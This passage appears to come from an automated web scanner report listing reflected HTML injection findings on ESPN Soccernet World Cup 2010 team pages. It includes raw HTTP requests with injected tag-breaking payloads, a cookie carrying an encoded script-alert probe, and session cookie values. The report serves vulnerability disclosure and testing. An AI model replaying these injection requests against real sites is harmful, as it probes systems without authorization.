GET /worldcup2010/team/_/team/478/france?80bf3"><a>247a72dcc41=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:24 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:24 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN17 Cache-Expires: Sat, 06 Nov 2010 23:13:24 GMT Content-Length: 80543 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>France Football / S ...[SNIP]... <a href="/worldcup2010/team?team=478&80bf3"><a>247a72dcc41=1&_slug_=france&80bf3"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a81a1"><a>b81a40a8bd9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4789/ivory-coasta81a1"><a>b81a40a8bd9 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:15:13 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:15:08 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN15 Cache-Expires: Sat, 06 Nov 2010 23:20:08 GMT Content-Length: 81695 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ivory Coast Footbal ...[SNIP]... <a href="/worldcup2010/team?team=4789&_slug_=ivory-coasta81a1"><a>b81a40a8bd9&topId=802166&linktext=Eriksson+hails+Ivory+Coast+players"> ...[SNIP]...
5.95. http://soccernet.espn.go.com/worldcup2010/team/_/team/4789/ivory-coast [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/4789/ivory-coast
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44ff8"><a>ef29493db25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4789/ivory-coast?44ff8"><a>ef29493db25=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:11:09 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:11:08 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 23:16:08 GMT Content-Length: 81803 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ivory Coast Footbal ...[SNIP]... <a href="/worldcup2010/team?team=4789&44ff8"><a>ef29493db25=1&_slug_=ivory-coast&44ff8"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b84"><a>1e9fca54d00 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/479/denmark46b84"><a>1e9fca54d00 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:48 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:48 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN31 Cache-Expires: Sat, 06 Nov 2010 23:13:48 GMT Content-Length: 82130 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Denmark Football / ...[SNIP]... <a href="/worldcup2010/team?team=479&_slug_=denmark46b84"><a>1e9fca54d00&topId=801786&linktext=Denmark+coach+devastated+by+defeat"> ...[SNIP]...
5.97. http://soccernet.espn.go.com/worldcup2010/team/_/team/479/denmark [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/479/denmark
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92395"><a>78611054bea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/479/denmark?92395"><a>78611054bea=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:53 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:53 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN06 Cache-Expires: Sat, 06 Nov 2010 23:12:53 GMT Content-Length: 82238 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Denmark Football / ...[SNIP]... <a href="/worldcup2010/team?team=479&92395"><a>78611054bea=1&_slug_=denmark&92395"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95388"><a>7a7e4d9961e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/481/germany95388"><a>7a7e4d9961e HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:42 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:42 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN04 Cache-Expires: Sat, 06 Nov 2010 23:14:42 GMT Content-Length: 80545 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Germany Football / ...[SNIP]... <a href="/worldcup2010/team?team=481&_slug_=germany95388"><a>7a7e4d9961e&topId=807747&linktext=Germany+finish+in+third+place"> ...[SNIP]...
5.99. http://soccernet.espn.go.com/worldcup2010/team/_/team/481/germany [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/481/germany
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6197"><a>19cb7e46d2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/481/germany?c6197"><a>19cb7e46d2e=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:44 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:44 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 23:13:43 GMT Content-Length: 80653 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Germany Football / ...[SNIP]... <a href="/worldcup2010/team?team=481&c6197"><a>19cb7e46d2e=1&_slug_=germany&c6197"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1efcc"><a>d926d468a72 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/482/portugal1efcc"><a>d926d468a72 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:26:53 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:26:53 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN03 Cache-Expires: Sat, 06 Nov 2010 23:31:53 GMT Content-Length: 81605 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Portugal Football / ...[SNIP]... <a href="/worldcup2010/team?team=482&_slug_=portugal1efcc"><a>d926d468a72&topId=804233&linktext=Portugal+depart+after+Spain+defeat"> ...[SNIP]...
5.101. http://soccernet.espn.go.com/worldcup2010/team/_/team/482/portugal [name of an arbitrarily supplied request parameter]previousnext
Summary
